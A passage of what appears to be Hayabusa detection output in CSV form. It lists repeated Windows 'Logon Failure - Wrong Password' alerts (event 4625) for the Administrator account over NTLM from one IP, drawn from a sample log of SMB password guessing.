Type: 3 | Computer: zOAH0gjfs8JcXSMO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.117 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TnnB4KPBiDvKMsUL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.153 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0aZRgpa5riqIEWhQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.198 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BBL4nrs7f6cjlfsT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.247 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fgDupzqipe5jK0r5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.280 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5yPcTOWPuN8efJtl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.320 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: Dszb6s0w6glvSkSw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.357 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ynu936pVVAuDUGT5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.407 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c55o3Dca2tiUVwb2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.444 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tnDmp2KK02LyJ7Xm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.499 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xRUKrHDAmgEPcjQw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.548 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PCGKDvPhzg6BlsuU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.594 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: OU28biGLJkFmB117 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.628 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 029LphuWcoo9S2hL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.670 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ItIROqP2wyzLJa9s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.712 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XngGun3HYopTkcrA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.749 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c91Qz5QNUczcm7m6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.784 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t7nyWJJJhDiqnf1d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.828 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bnj7hAp20gZE9FCe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.869 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FydQjBxO7XninU5Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.901 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3P8InIzyD86BXr1d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.945 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wvKGa3A3qw7s0cZX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.993 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QTY7tRVEMjXZXFyH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:51.044 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m4Ij1NSYGYbq4PxS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:50:51.088 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 47fOxZAYhjxLzEoU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:51.124 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aGxXaNNChVScbHe6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:51.161 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jTcVeB8f2Rs3Bldo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:51.201 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yeSnUlIbuDVNffey | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:51.308 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eXIM4tWru1x0AahJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:51.379 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m2pBLn6aO8L4kiH5 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:51.441 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EG5daDsgTMZsNg0T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:51.492 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3V8z6j7GLO3ywBXc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:51.528 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AsezMvhUNedLNqg4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:51.574 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h16AvUVZG8qch7LC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:51.687 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PB5xe3Aieya8N3IU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:51.765 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ezGXIhYrkk2Q9pe5 | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:51.813 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VSGIVhD6pO5z47DY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:51.862 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2vEjOhJW9G3aIfV0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:51.904 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hyvCpW3aOZqCOldu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:51.950 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oyhS2wAAkfmZuLll | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:51.993 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0bEh0KTMbbFtsfck | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:52.044 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
mw9u61efa06vYv6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:52.092 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SAxij8QYLxxriIvu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:52.134 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HK2tbzICSpTrglud | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:52.176 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4rHJ70VrEwCQjSvL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:52.225 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8qwZT66ExkdJDZaT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:52.260 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ezuHluj1fEC9KdQ1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:52.300 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: bXH5uDfo4WB6QEnQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:52.336 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yWvZjuZhnGcrelOM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:52.434 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vb6ePjmpA8ZwK1PW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:52.473 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7e1A9ZY20WM8oDn6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:52.523 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 71GKLnXqSEEuc1Fw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:52.556 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w0GsW0vDEkpRa1X0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:52.600 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 0HH6zUUoL0qlfFC2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:52.636 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AG4pYsjob1iwlOc0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:52.677 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dNCX5tZ0nF1foTLW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:52.710 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vO82Kb0kboVFuJy6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:52.793 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DptE2C8ZK3AxCb43 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:52.871 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NC8manvVP5pU8F3N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:52.926 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: m00bI5welsLUWmwJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:52.976 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4shyxJk2PiH1TDlj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.014 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xZyN2WO3UVY0WQs6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.053 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oSQjAMckifap5r1k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.096 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qixqXiX0mVcuXe37 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.126 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gIfJCJz6l36WMeY9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.166 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SZxv5U7uoN6E8c8E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.209 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mlIfE0N32OQeWuNw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.256 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nkZcjpTmHcJ0uX38 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.301 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GZfaHr2Yq6xkRjOI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.336 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jvy0EIiPSnom7pn3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.380 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TN9PUb0BgI3u8Xax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:50:53.429 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xCgz5BNpQgLgW0Xi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.478 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: po2GBdrXr3XtBsWR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.524 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O2rgo6jHcqu10IGY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.573 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MLblUOGzYzVA47E9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.616 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ysuA1xpYuAGRNONJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.660 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ksedziaGzXk5VNlS | IP Addr: 192.168.198.149 | AuthPackage: 
